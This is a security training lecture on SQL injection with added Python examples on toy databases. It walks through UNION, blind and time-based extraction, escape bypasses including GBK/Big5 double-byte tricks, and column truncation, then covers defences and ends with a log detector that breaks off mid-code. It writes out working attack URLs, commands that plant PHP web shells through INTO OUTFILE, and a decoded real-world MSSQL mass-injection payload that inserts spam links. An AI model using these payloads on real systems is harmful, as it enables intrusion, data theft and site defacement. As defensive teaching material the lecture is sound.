Server-Side Attack and Defence I
Taien internal security lecture IV: Server-Side Attack and Defence I
2013-03-07 (ROC date 1020307), Hiiir Inc.
Taien Wang <taien_wang@hiiir.com>
Hiiir Inc. (英屬維京群島商時間軸科技股份有限公司), New Ventures Division
1020307 Server-Side Attack and Defence I - Outline
• SQL Injection
  – Attack techniques
    • Testing whether a parameter is injectable
    • Commonly used functions
    • UNION
    • Bypassing escaped characters
      – ASCII encoding
      – Hexadecimal encoding
      – Double-byte (wide character) escape bypass
  – SQL Blind Injection
    • Time-Based Blind SQL Injection
  – SQL Column Truncation
SQL Injection - Introduction
• rfp, "NT Web Technology Vulnerabilities", Phrack 54, 1998
• Wikipedia
  – SQL injection (in mainland China "SQL注入攻擊"), also called a hidden-code attack, is a security flaw at the database layer of an application. In short, SQL commands are smuggled inside an input string; if a poorly designed program skips validation, the database server treats the smuggled commands as legitimate SQL and executes them, and the data is compromised.
SQL Injection - Contents of the sample database
SQL Injection - Think about it: what is wrong with this code?
SQL Injection attack techniques - Quick tests for a vulnerability
• http://www.hackdemo.com/getUser.php?id=1
• http://www.hackdemo.com/getUser.php?id='
• http://www.hackdemo.com/getUser.php?id=9999999
• http://www.hackdemo.com/getUser.php?id=1'
• http://www.hackdemo.com/getUser.php?id=1+and+1=1
• http://www.hackdemo.com/getUser.php?id=1+and+1=2
A parameter is worth pursuing when the `and 1=1` page matches the original while the `and 1=2` page differs, or when a lone quote produces a database error.
SQL Injection attack techniques - Whitespace and comments
• Mixed-case keywords (uNiOn SeLeCt)
• Comments: # (URL-encoded %23), -- (followed by a space)
• Whitespace substitutes: + in the query string, or any of the URL-encoded characters below

URL encoding   Purpose
%09            horizontal tab
%0a            line feed
%0b            vertical tab
%0c            form feed
%0d            carriage return
%20            space
SQL Injection attack techniques - Functions commonly used to extract data (MySQL)
Function                        Purpose
LENGTH(str)                     Length of str in bytes
LEFT(str, len)                  The leftmost len characters of str
RIGHT(str, len)                 The rightmost len characters of str
SUBSTRING(str, pos, len)        Substring of str, len characters starting at pos
SUBSTR(str, pos, len)           Synonym for SUBSTRING
MID(str, pos, len)              Synonym for SUBSTRING
CHAR(N, ... [USING charset])    String made of the characters with the given integer codes
HEX(N_or_S)                     Hexadecimal representation of the number N, or of each byte of the string S
ASCII(str)                      Numeric value of the leftmost character of str
CONCAT(str1, str2, ...)         Concatenation of all arguments
NAME_CONST(name, value)         Returns value; when used to produce a result-set column, the column takes the given name. From 5.1 on both arguments must be constants
...
SQL Injection attack techniques - Related system functions and variables
Function / variable                          Purpose
LOAD_FILE(file_name)                         Reads a file from the database server
... INTO OUTFILE '/var/www/html/back.php'    Writes the query result to a file
VERSION()                                    MySQL server version
DATABASE()                                   Name of the current database
USER()                                       Current MySQL user name and host
SYSTEM_USER()                                Synonym for USER()
SESSION_USER()                               Synonym for USER()
SCHEMA()                                     Synonym for DATABASE()
CURRENT_USER()                               The authenticated user name and host; may differ from USER()
@@datadir                                    Path of the data directory
@@basedir                                    Installation path of the server
...
SQL Injection attack techniques - Requirements for reading files
• The file must be on the database server
• The full path must be given
• The MySQL account needs the FILE privilege and the file must be readable by everyone
• The file must be smaller than max_allowed_packet
SQL Injection attack techniques - UNION
• PHP + MySQL (mysql_query) does not support stacked queries, so a UNION query is used instead
  – Vulnerable SQL with an unquoted parameter (PHP):
    • SELECT * FROM `member` WHERE `id` = $id
  – Attack example, unquoted:
    • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4
  – Statement actually executed:
    • SELECT * FROM `member` WHERE `id` = 1 AND 1=2 UNION SELECT 1,2,3,4
  – The UNION must supply the same number of columns as the original SELECT; the literals 1,2,3,4 reveal which columns the page echoes back
SQL Injection attack techniques - UNION
• PHP + MySQL (mysql_query) does not support stacked queries, so a UNION query is used instead
• Vulnerable SQL with a quoted parameter (PHP):
  • SELECT * FROM `member` WHERE `name` LIKE '$name'
• Attack example, quoted: close the quote, then comment out the trailing quote with %23 (#)
  • http://www.hackdemo.com/searchUser.php?name=h'+and+1=2+union+select+1,2,3,user()%23
• Statement actually executed:
  • SELECT * FROM `member` WHERE `name` LIKE 'h' and 1=2 union select 1,2,3,user()#'
SQL Injection attack techniques - Gaining control of the statement
SQL Injection attack techniques - Guessing data
• Find the length
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1
  – ...
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7
• Guess the content one character at a time
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'
  – ...
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'
Each request is a yes/no question: the page renders the user only when the appended condition is true.
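The probing, UNION and character-by-character guessing above, run end to end against a toy database. This is an added example, not code from the slides: SQLite stands in for MySQL so it runs offline, the `member` rows are constructed sample data, and `unicode()` plays the role of MySQL's ASCII() so the extraction payload needs no quote character.

```python
import sqlite3

# Added example (not from the slides). SQLite stands in for MySQL so the block
# runs offline; the `member` rows below are constructed sample data.
SAMPLE_ROWS = [
    (1, "alice", "s3cr3t!", "alice@example.invalid"),
    (2, "bob", "hunter2", "bob@example.invalid"),
]


def make_db():
    """In-memory stand-in for the deck's `member` table (id, name, password, email)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE member (id INTEGER, name TEXT, password TEXT, email TEXT)")
    con.executemany("INSERT INTO member VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def get_user_vulnerable(con, raw_id):
    """Mirrors the slide's `SELECT * FROM member WHERE id = $id`: the unquoted
    parameter is pasted straight into the statement (deliberately vulnerable)."""
    sql = "SELECT * FROM member WHERE id = " + raw_id
    return con.execute(sql).fetchall()


def is_injectable(con):
    """The deck's quick test: `id=1`, `id=1 and 1=1`, `id=1 and 1=2`.
    If the first two responses agree and the third differs, the parameter
    is being evaluated as SQL."""
    base = get_user_vulnerable(con, "1")
    true_case = get_user_vulnerable(con, "1 and 1=1")
    false_case = get_user_vulnerable(con, "1 and 1=2")
    return base == true_case and base != false_case


def union_dump(con):
    """`id=1 and 1=2 UNION SELECT ...`: the real WHERE matches nothing, so the
    four columns the page renders now carry attacker-chosen values. Tabs and a
    newline replace spaces, as in the whitespace table above."""
    payload = "1\tand\t1=2\nUNION\tSELECT\tname,password,3,4\tFROM\tmember"
    return get_user_vulnerable(con, payload)


def blind_extract(con, column="password", row_id=1):
    """Boolean-based blind extraction of one column value: the LENGTH() and
    RIGHT() loop from the slide, generalised to every position with SUBSTR().
    Characters are compared as code points via unicode() (SQLite's ASCII()),
    so the payload contains no quote character at all."""
    def oracle(condition):
        return get_user_vulnerable(con, f"{row_id} and ({condition})") != []

    length = next(n for n in range(1, 65) if oracle(f"LENGTH({column})={n}"))
    recovered = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):            # printable ASCII
            if oracle(f"unicode(SUBSTR({column},{pos},1))={code}"):
                recovered += chr(code)
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db))
    print("union rows:", union_dump(db))
    print("blind extraction of password for id=1:", blind_extract(db))
```

Every `oracle()` call is one HTTP request in the real attack; the length probe costs at most 64 requests and each character at most 95, which is why the later sections move to time delays when the page gives no visible true/false difference.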
SQL Injection attack techniques - Reading and writing files
• Dump data to a file
  – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:\Website\www.hackdemo.com\member.txt'
• Write a backdoor
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+into+outfile+'D:\Website\www.hackdemo.com\cmd.php'
  – The first column is the string "<?php system($_GET['cmd']);?>", URL-encoded; INTO OUTFILE writes it into the web root as cmd.php
With escaping added and error messages switched off, is the application safe now?
SQL Blind Injection
• Blind SQL injection is another form of SQL injection. Ordinary SQL injection relies on error messages to build the attack; blind injection relies only on whether the injected condition evaluates to true or false
• SQL Blind Injection
  – Ordinary (boolean-based) blind injection
  – Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (1/2)
• Use a measurable delay in the response to tell whether the injected condition was true
• Techniques
  – Built-in functions
    • BENCHMARK(count, expr)
    • SLEEP(seconds), MySQL >= 5
  – Build a deliberately slow statement (heavy queries)
Time-Based Blind SQL Injection - Using heavy queries (2/2)
Time-Based Blind SQL Injection - Guessing the database name through a delay
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• ...
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
Only when the guess is right (here the first character 'h', CHAR(104)) does the BENCHMARK branch run and the response stall; every other guess returns immediately.
SQL Injection attack techniques - Bypassing escaped characters
• ASCII encoding
  – ASCII(), CHAR()
  – Single character
    • CHAR(68)
  – Several characters
    • CHAR(68,58,92)   (the string D:\)
• Hexadecimal encoding
  – HEX()
  – 0x443A5C   (the same string D:\)
• Double-byte escape bypass
SQL Injection attack techniques - Guessing data (bypassing escaping)
• Guessing table names
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guessing column data without a quote character
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
  – ...
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection attack techniques - Reading files (bypassing escaping)
• Read a file without a single quote in the payload
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
    (the char() list spells D:\Website\www.hackdemo.com\getUser.php)
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
    (the hex literal spells D:\Website\www.hackdemo.com\config.php)
SQL Injection attack techniques - Writing a file when the quote restriction cannot be bypassed
1. Find phpMyAdmin
2. Connect to MySQL remotely and run the statement from a hex literal via a prepared statement, so no quote is ever typed:
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a decodes to:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
and the file written is:
<?php @eval($_POST['cmd']);?>
SQL Injection attack techniques - Double-byte escape bypass (1/3)
• An injected lead byte combines with the backslash (0x5C) that escaping inserts, forming one two-byte character; the quote that follows is then no longer escaped
• Scenario
  – Escaping is done by
    • addslashes
    • mysql_escape_string
    • php.ini with magic_quotes_gpc = On
  – The connection uses BIG5 or GBK
    • set names gbk / set names big5
SQL Injection attack techniques - Double-byte escape bypass (2/3)
• Chinese text is stored as two bytes per character
  – Big5
    • High byte 0x81-0xFE, low byte 0x40-0x7E and 0xA1-0xFE
  – GBK
    • Lead byte 0x81-0xFE, trail byte 0x40-0x7E (and 0x80-0xFE)
  – GB2312
    • Lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – Because 0x5C (backslash) is a valid trail byte, lead bytes such as %BF, %CC, %D5 ... swallow the escaping backslash
SQL Injection attack techniques - Double-byte escape bypass (3/3)
• Bypassing escaping on a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%D5'+AND+1=2+UNION+SELECT+1,2,3,4%23
After addslashes the bytes are h %B5 %5C ' ...; under a double-byte connection charset %B5%5C is read as one character, the quote closes the literal, and the rest is parsed as SQL.
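The byte-level mechanics of the three slides above, as an added example that is not part of the deck. It emulates addslashes() and MySQL's string-literal parsing in plain Python (no server involved) and uses %BF as the lead byte; the escaping is then repeated the way a charset-aware mysql_real_escape_string() does it, which is the fix. The query text and input strings are constructed.

```python
from typing import Optional

# Added example (not from the slides). Everything is emulated at the byte
# level; no MySQL server is involved, so this runs offline.


def addslashes(data: bytes) -> bytes:
    """Byte-wise emulation of PHP's addslashes()/magic_quotes_gpc: a backslash
    (0x5C) is put before ', ", \\ and NUL without looking at the charset."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(escaped_name: bytes) -> bytes:
    """The slide's `SELECT * FROM member WHERE name LIKE '$name'`, as the raw
    bytes the PHP mysql client would send."""
    return b"SELECT * FROM `member` WHERE `name` LIKE '" + escaped_name + b"'"


def literal_end(text: str, start: int) -> int:
    """Index of the quote closing the string literal opened at `start`,
    honouring backslash escapes the way MySQL's parser does."""
    i = start + 1
    while i < len(text):
        if text[i] == "\\":
            i += 2                      # escaped character: skip it
            continue
        if text[i] == "'":
            return i
        i += 1
    raise ValueError("unterminated string literal")


def injected_sql(raw_input: bytes, connection_charset: str) -> str:
    """Whatever trails the name literal after MySQL decodes the escaped query
    under the connection charset (SET NAMES ...). Empty means the escaping
    held; anything else is attacker text that will be parsed as SQL."""
    query = build_query(addslashes(raw_input))
    try:
        text = query.decode(connection_charset)
    except UnicodeDecodeError:
        return ""                       # invalid bytes are not merged with the backslash
    start = text.index("'")
    return text[literal_end(text, start) + 1:]


def escape_charset_aware(raw_input: bytes, connection_charset: str) -> Optional[bytes]:
    """What mysql_real_escape_string() does once the client knows the connection
    charset (mysql_set_charset() in PHP): decode first, escape per character,
    re-encode. A stray lead byte fails to decode and is rejected outright."""
    try:
        text = raw_input.decode(connection_charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + ch if ch in "'\"\\\0" else ch for ch in text)
    return escaped.encode(connection_charset)


if __name__ == "__main__":
    attack = b"h\xbf' AND 1=2 UNION SELECT 1,2,3,4#"     # h %BF ' ... as on the slide
    for charset in ("gbk", "big5", "utf-8", "latin-1"):
        print(f"{charset:8s} trailing SQL: {injected_sql(attack, charset)!r}")
    print("charset-aware escape of the attack:", escape_charset_aware(attack, "gbk"))
```

Under gbk (and big5) the trailing SQL is the attacker's `AND 1=2 UNION SELECT ...`; under utf-8 the stray 0xBF byte does not decode at all, and under a single-byte charset the backslash keeps protecting the quote. Note also that byte-wise addslashes() corrupts a legitimate character whose trail byte is 0x5C by inserting a backslash inside it; the charset-aware version escapes per character and leaves it intact.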
SQL Column Truncation - Introduction (1/3)
• MySQL sql_mode
  – STRICT_ALL_TABLES not enabled
    • Inserting a value longer than the column produces a warning
    • But the row is still inserted, with the value silently truncated
  – STRICT_ALL_TABLES enabled
    • Inserting a value longer than the column produces ERROR 1406 (Data too long)
    • The row is not inserted
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - Effect (2/3)
SQL Column Truncation - Defences (3/3)
• Actively strip whitespace from fields that should never contain it
  – e.g. account names
• Add BINARY to the comparison when SELECTing, so trailing spaces are no longer ignored
• Configure MySQL to compare in binary by default (a binary collation on the column)
• Enable STRICT_ALL_TABLES in MySQL
  – An over-long value raises an ERROR instead of a WARNING
  – Inserts that used to be silently truncated now fail, so INSERT/UPDATE paths may need extra length checks to avoid errors
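The truncation attack and each of the four defences, as an added example that is not part of the slides. It is a pure-Python emulation of the MySQL behaviours the three slides describe (non-strict truncation, PAD SPACE comparison, BINARY comparison, STRICT_ALL_TABLES), so it runs offline; the column width, user names and passwords are constructed assumptions.

```python
# Added example (not from the slides): a pure-Python emulation of the MySQL
# behaviours the deck describes, so the attack and each defence can be seen
# offline. Column width, names and passwords are constructed assumptions.

USERNAME_MAX = 16      # assume `username VARCHAR(16)`


class DataTooLong(Exception):
    """Stands in for MySQL ERROR 1406 under STRICT_ALL_TABLES."""


def store_username(value: str, strict: bool) -> str:
    """What the server keeps for an over-long value: non-strict sql_mode
    truncates with a warning, strict mode refuses the row."""
    if len(value) > USERNAME_MAX:
        if strict:
            raise DataTooLong(f"Data too long for column 'username' ({len(value)} > {USERNAME_MAX})")
        return value[:USERNAME_MAX]
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """Default (PAD SPACE) collation: trailing spaces are ignored, so
    'admin' and 'admin           ' both satisfy `WHERE username = 'admin'`."""
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a: str, b: str) -> bool:
    """`WHERE BINARY username = ?`: byte-exact, trailing spaces count."""
    return a == b


def simulate(strict: bool, sanitize: bool, binary: bool) -> str:
    """Register 'admin<spaces>x' next to an existing 'admin', then log in as
    'admin' with the attacker's password. Returns what happened."""
    users = [("admin", "pw-admin")]
    attacker_name = "admin" + " " * 11 + "x"          # 17 chars: over the column width
    attacker_pw = "pw-attacker"

    if sanitize:                                        # defence 1: no whitespace in identifiers
        attacker_name = " ".join(attacker_name.split())
    # Sign-up duplicate check, the only check the vulnerable app had. Even with
    # the default collation it finds nothing: the trailing 'x' is not a space.
    if any(pad_space_equal(name, attacker_name) for name, _ in users):
        return "rejected: duplicate username"
    try:
        stored = store_username(attacker_name, strict)  # defence 4: STRICT_ALL_TABLES
    except DataTooLong as exc:
        return f"rejected: {exc}"
    users.append((stored, attacker_pw))

    compare = binary_equal if binary else pad_space_equal   # defences 2/3: BINARY comparison
    matches = [name for name, pw in users if compare(name, "admin") and pw == attacker_pw]
    return "account takeover" if matches else "safe"


if __name__ == "__main__":
    for flags in [(False, False, False), (True, False, False), (False, True, False), (False, False, True)]:
        print("strict=%s sanitize=%s binary=%s -> %s" % (*flags, simulate(*flags)))
```

With none of the defences, the 17-character name is stored as 'admin' plus eleven spaces, which the default comparison treats as 'admin'; the attacker's password then logs in as the administrator. Any one of the defences breaks the chain, at different points: sanitising and strict mode stop the row being written, BINARY comparison stops the lookup from matching it.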
SQL Injection - Further thoughts
• Can INSERT and UPDATE statements be attacked too?
• Does NoSQL really have no injection?
• Other exploitation techniques
  – Deep blind injection
  – Error-based injection
    • Duplicate-key error
    • Function errors
  – information_schema
  – User-Defined Functions (UDF)
  – Triggers
SQL Injection - Automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• ...
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid BIG5 and GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use a safe encoding library
  – OWASP ESAPI
    • MySQLCodec
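The "prepared statements" and "check data types" bullets applied to the deck's two vulnerable queries, as an added example that is not part of the slides. SQLite stands in for MySQL (the bound-parameter mechanism is the same in mysqli/PDO), the `member` rows are constructed, and the strict integer check is a design choice of this example: PHP's intval('1 and 1=2') quietly returns 1, which hides probing rather than stopping it.

```python
import sqlite3
from typing import Optional

# Added example (not from the slides): prepared statements plus strict type
# checks for the deck's two queries, with SQLite standing in for MySQL and
# constructed `member` rows.


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE member (id INTEGER, name TEXT, password TEXT, email TEXT)")
    con.executemany("INSERT INTO member VALUES (?, ?, ?, ?)", [
        (1, "alice", "s3cr3t!", "alice@example.invalid"),
        (2, "bob", "hunter2", "bob@example.invalid"),
    ])
    return con


def parse_id(raw: str) -> Optional[int]:
    """Type check + cast (the deck's intval()/settype() point), done strictly:
    anything that is not a plain integer is rejected instead of being
    coerced, so `1 and 1=2` never reaches the database at all."""
    raw = raw.strip()
    if not raw.lstrip("-").isdigit():
        return None
    return int(raw)


def get_user_safe(con, raw_id: str):
    """`SELECT * FROM member WHERE id = ?` with the value bound as a parameter:
    it travels as data and can never be parsed as SQL."""
    user_id = parse_id(raw_id)
    if user_id is None:
        return []
    return con.execute("SELECT * FROM member WHERE id = ?", (user_id,)).fetchall()


def search_user_safe(con, raw_name: str):
    """The quoted LIKE case: bind the pattern, and escape the user's own
    % and _ so they cannot widen the match either."""
    pattern = (raw_name.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    return con.execute(
        "SELECT * FROM member WHERE name LIKE ? ESCAPE '\\'", (pattern,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(get_user_safe(db, "1"))
    print(get_user_safe(db, "1 and 1=2 UNION SELECT 1,2,3,4"))
    print(search_user_safe(db, "h' and 1=2 union select 1,2,3,user()#"))
```

The first bullet, least privilege, belongs in the database rather than the code: a web account granted only SELECT/INSERT/UPDATE on its own tables, and in particular without the FILE privilege, turns LOAD_FILE() and INTO OUTFILE from the earlier slides into dead ends even if an injection is found.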
MSSQL real-world case - 116jurist.ru automated injection (1/4)
• 2012-12-xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c65732074207768657265 20632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f722046455443 48204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c2043484152494e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (2/4)
• 2012-12-xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272b40542b275d20414c54455220434f4c554d4e205b272b40432b275d2076617263686172283830303029204e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (3/4)
• 2012-12-xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e272720272920464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• Payload 1 (strips a previously injected tag from every text column longer than 10 characters):
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• Payload 2 (widens every text column longer than 20 characters to varchar(8000) so the link fits):
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• Payload 3 (appends a hidden spam link to every text column longer than 80 characters; the link text is CP1251-encoded Russian, "юридические-услуги-москва"):
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The three requests arrived 13 seconds apart from one automated tool: clean out the previous campaign's tag, make room, then re-inject. Hex-encoding the whole statement inside cast(... as varchar) is what lets it pass through a quote-escaping filter, since the request contains no quote at all.
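Since the payload shape (declare, cast(0x... as varchar), exec) is constant across the three requests, it is easy to pick out of web logs after the fact. The detector below is an added example, not part of the deck: the log lines are constructed samples in Apache combined format with invented addresses and timestamps, and the hex payload in them is a shortened T-SQL string built inside the block.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the slides): a log-side detector for the hex-cast
# payload family above. The log lines are constructed samples in Apache
# combined format; the addresses and timestamps are invented.

# declare @s varchar(8000) set @s=cast(0x<hex> as varchar(8000)) exec(@s)
HEX_EXEC_RE = re.compile(
    r"declare\s+@(?P<var>\w+)\s+varchar\(\d+\)\s*"
    r"set\s+@(?P=var)\s*=\s*cast\(\s*0x(?P<hex>[0-9a-f]+)\s+as\s+varchar\(\d+\)\s*\)\s*"
    r"exec\(\s*@(?P=var)\s*\)",
    re.IGNORECASE,
)


def decode_hex_payload(hex_digits: str) -> str:
    """cast(0x... as varchar) hands MSSQL the raw bytes. This family is
    single-byte text (the spam link in payload 3 is cp1251), so decode
    byte-for-byte and leave the link text as it is."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits
    return bytes.fromhex(hex_digits).decode("latin-1")


def classify(tsql: str) -> str:
    """Coarse label from the decoded statement: the three steps the
    116jurist.ru script ran, in the order it ran them."""
    t = tsql.upper()
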